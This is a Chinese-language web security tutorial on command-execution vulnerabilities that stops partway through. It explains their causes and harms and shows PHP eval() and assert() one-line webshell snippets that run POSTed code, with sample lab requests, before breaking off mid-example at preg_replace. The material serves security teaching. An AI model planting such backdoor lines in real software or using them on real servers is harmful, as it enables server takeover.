WEB安全之:命令执行

本文深入探讨了命令执行的概念,起因是应用程序未能严格过滤用户输入,导致潜在的安全风险。危害包括权限提升、反弹shell及内网渗透。讨论了PHP、Python中的命令执行函数,以及Java中的反射机制。并详细讲解了如何利用命令执行漏洞写入恶意文件和通过特殊字符执行系统命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

1 命令执行介绍

产生原因

  • 应用未对用户输入做严格的检查过滤,导致用户输入的参数被当成命令来执行。

危害

  • 继承 WEB 服务程序的权限去执行系统命令或读写文件
  • 反弹 shell,获得目标服务器的权限
  • 进一步内网渗透

2 命令执行函数

2.1 远程命令执行函数

  • PHP 中的执行命令函数:

    • // eval() 函数传入的参数必须为 PHP 代码,并以分号结尾。
      eval()
      <?php
      @eval($ret=$_POST["cmd"]);
      echo $ret;
      ?>
      执行语句
      http://exec.lab.com/exec/exec01.php
      [post data]
      cmd=phpinfo();
      
    • // assert() 函数是直接将传入的参数当成 PHP 代码执行,不需要以分号结尾。
      assert()
      <?php
      $ret=@assert($_POST["cmd"])
      echo $ret;
      ?>
      执行语句
      http://exec.lab.com/exec/exec02.php
      [post data]
      cmd=phpinfo()
      
    • preg_replace(reg, 'repl', 'string')
      
      <?php preg_replace("/string/e", $_POST[
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值